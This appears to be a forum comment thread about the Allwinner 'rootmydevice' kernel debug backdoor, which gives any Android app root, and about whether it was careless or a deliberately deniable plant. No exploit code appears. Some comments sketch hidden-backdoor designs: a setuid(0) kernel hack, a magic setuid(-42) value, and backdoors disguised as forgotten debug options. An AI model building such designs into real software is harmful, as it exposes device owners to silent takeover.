Relatedly, here is a post 6 years ago by someone putting in a root backdoor in a device he designed --- and explaining how to use it:
If that was today, someone would discover it, scream "backdoor! security vulnerability!", and it would be all over the news like this one. And that makes me very sad.
This allows any app to gain root. Without user interaction. That is insane.
The only thing that is insane here is that we all deem this as "normal".
"Well, in our country," said Alice, still panting a little, "you'd generally get to somewhere else—if you run very fast for a long time, as we've been doing."
"A slow sort of country!" said the Queen. "Now, here, you see, it takes all the running you can do, to keep in the same place. If you want to get somewhere else, you must run at least twice as fast as that!" 
The update treadmill is normal, in the classic sense of the word.
Taking over something and operating it without permission is highly congruent with naval piracy. So perhaps hung from the yardarm is better. At any rate, something gruesome, public and nasty needs to happen to them.
Yes, I think the basic ... drive to do this is just latent in people, and they initially did it just for the heck of it. There was no money in it to start with.
How this could be considered anything other than deeply antisocial is beyond me.
Side-loading unsigned 'ROM's/packages and gaining root are orthogonal concepts in Android: sometimes you want to obtain app-level root in the factory-installed OS - sideloading won't help with that (unless you are side-loading a rooted ROM, but that is not a given)
As I said: sometimes you just want to run 1 app as root, not replace the kernel. Also, good luck getting a usable device with your own kernel/software when chip manufacturers don't provide drivers: unless you don't mind the usual litany of XDA caveats ("N0irROM v.0.4. Not working: Camera, GPS, Hardware acceleration. new: mic now working, randomly reboots less often")
You mean, like Google? Nexus devices can be rooted just fine. They just don't give root permissions to any app without asking or even informing me.
Or did I miss something and a more viable (including economically) concept is invented?
But apparently they stepped up their game. Even for debugging this is an odd one.
(I really miss the old days when you got a document that explained everything about your processor. I have an ARM port of an experimental OS waiting for a new board with a complete data sheet. It's been a year so far.)
Googling "AllWinner A20 datasheet" brings in good results.
"Broadcom BCM2836 datasheet" doesn't. All you get is part of the GPIO registers, and absolutely NO electrical specifications. (Part of me really wants someone working there to "take one for the community" and leak the full datasheet. Ironically, that's how the AllWinner docs were originally released.)
Now, who wants to blame upstream kernel maintainers for not merging in all the dirt around and requiring high quality of code submissions?
I think upstream support for the chips affected by this got stuck in long arguments about the most elegant way to support their clocking and reset infrastructure, which needs to be solved before actual peripheral drivers can be developed. The H3 seems to be approaching the point where it has enough upstream support for a handful of limited uses, over a year after the mainlining effort started. The A83T is still held up on getting the support code necessary to actually boot Linux merged.
I think modern Intel chips are similar, except that they run closed-source management firmware to help them look more like a collection of separate devices to Windows - but they aren't and Skylake can't enter lower CPU power states unless the SATA link is in power-saving mode and a whole bunch of other peripherals co-operate because they share hardware. ARM SoCs just don't have the magic firmware that lets the drivers hide this from the OS.
Who is responsible for the fact that an active I2C device prevents entering sleep state 0 but an active SPI device does not? Where does that information get recorded? And who needs to act on it?
On the RPi, you can change pin direction without being in supervisor mode--that's not true on the BeagleBone.
These aren't easy questions, and the Linux architecture makes it even harder.
This could be locked down so that, say, only processes which are members of a certain group can open a file descriptor to this proc entry.
This is a lot of unnecessary effort to implement something that can be obtained with a simple /bin/rootmydevice executable that is chmod u+s. (Though it is somewhat more streamlined: no intervening process execution is required).
Which, in turn, is a lot of effort to reinvent sudo.
(But of course, those are arguably front doors; you can easily scan the filesystem image for items that have u+s perms.)
I would do this kind of hole differently: why not just hack the kernel so that any process can do setuid(0). Or, slightly hide it: say, setuid(-42) gives you root privs.
He should have added:
3. add a backdoor;
Commit 7cc9a8fff679fcd31bca7d18c8b3b960796d032f was replaced by bcc3e09783ca31039183d5084d8480bd76d531f5, without the sunxi-debug.c file.
Compare https://github.com/allwinner-zh/linux-3.4-sunxi/commit/7cc9a... (original) with https://github.com/allwinner-zh/linux-3.4-sunxi/commit/bcc3e... (modified)
https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bcc3e09... → 404
Hence I am forced to choose other form factors.
It would be nice to flash my own choice of BIOS. As far as I can tell this is still not too common. That is a project to which I am willing to devote large amounts of time should the information needed ever become public.
It seems the newer the hardware the more complicated and difficult this becomes. By my estimation, there is certain value in older hardware because it is not as complicated and can be easier to control.
Here is an idea that stays with me year after year: another open source OS project that chooses a single item of hardware and supports only that item.
Silly fantasy: Perhaps a deal is struck with one or more factories that can produce it. Perhaps the terms could be public. Maybe user-developers become faithful and loyal buyers of the hardware, because they like the control. Perhaps they directly pay the costs of production through donations. I have no idea what would happen. That's the point of trying it.
Building this sort of symbiotic relationship between open source user-developers and a single hardware manufacturer based on a single item, one could reason it is in the best interest of the manufacturer to open the specs to the developers, if not the public.
I leave it to you to list all the many reasons this is not worth doing. Then sit back and enjoy the status quo.
But for those of you who are avid users of an open source OS, I ask you to consider:
Do you ever get tired of watching the project trying to keep pace with new hardware? How do you feel about when the manufacturers will not disclose the specs? Are you OK with binary blobs in your "open" system? How about not knowing whether your OS of choice is going to work with your new hardware? What if there was one item of hardware that you could be absolutely sure was always going to work with your preferred open source OS, and to its maximum capacity?
OK, you may now return to chasing the new (locked-down) hardware. Thank you for your time.
The Librem laptop was another attempt at this, but it failed pretty badly. They couldn't get around a lot of the "binary blob" issues with modern hardware. They're attempt may in fact show that truly open firmware on modern x86_64/amd64 machines may be impossible.
There's Novena, but I believe that's ARM based (which is possibly the best bet for truly open hardware today)
They should have done #ifdef DEBUG in the kernel source...
The permissions are set to world writable, so you're giving every app the right to modify your system.
I'm still not sure why Allwinner resorted to this silliness instead of using su like a sane developer. If anyone could loop me in that would be appreciated.
DDoS protection by CloudFlare
Maybe they can do it better and not turn people without JS away (at least while accesses are at a regular level)
For that to work they need to fingerprint and track you. Which is why they said they block users with NoScript or on TOR.
Thomas Kaiser appears to have been the first person to discover it on April 29th, 2016. http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390 (Thanks to HD Moore for linking me.)
From what I can tell, it went unnoticed for slightly under a year.
I may be wrong on those points. Maybe someone can correct me.
(search for rootmydevice)
Don't see why they did it, but they did in in the plainest and most visible way I can imagine.
Which is exactly my point.
Say you are a government organization that requires a backdoor. You can make a very sophisticated backdoor. When it's found it is clear that it is probably an intentional backdoor (e.g. Dual_EC_DRBG). Or you can make a very obvious backdoor that is disguised as a debugging option that you forgot to disable, an obvious logic error, etc. For such backdoors, it's easy to argue that it was just sloppy programming (in contrast to an intentional government-requested backdoor), so people will assume the simpler explanation (as in Hanlan's razor).
We have learned from the Debian OpenSSL saga  that trivial programming errors in critical software can go unnoticed for years. I don't think the Debian OpenSSL bug was government-mandated, but it's easy to see that this is a very attractive route: the bug caused only 32,768 unique private keys to be generated (great for spying), most people will believe it's a true programming error, you pay the person/company that introduces the bug royally for taking the blame.
"To Minsk," says the second.
"To Minsk, eh? What a nerve you have! I know you're telling me you're going to Minsk because you want me to think that you're really going to Pinsk. But it so happens that I know you really are going to Minsk. So why are you lying to me?"
What you're saying is that the diffs are hard to work with in general. What I'm saying is that in a diff (be it large or small, a single commit or many), the code they wrote is the most visible and understandable way to do what they did.
Not saying this was the actual intention here, but it'd be a plausible way to go about it. It certainly appears the backdoor is running on lots of devices in the wild before it got noticed (even when it's this obvious in the diff(!)), so "mission accomplished"? :)
If you're after privacy its about op-sec. Turning off the phone, not using it for certain activities, having different phones for different compartments of life.
People (me included) are lazy, and really, if your relying on a phone for your security...well..good luck with that.
The hardware is used in lowcost tablets...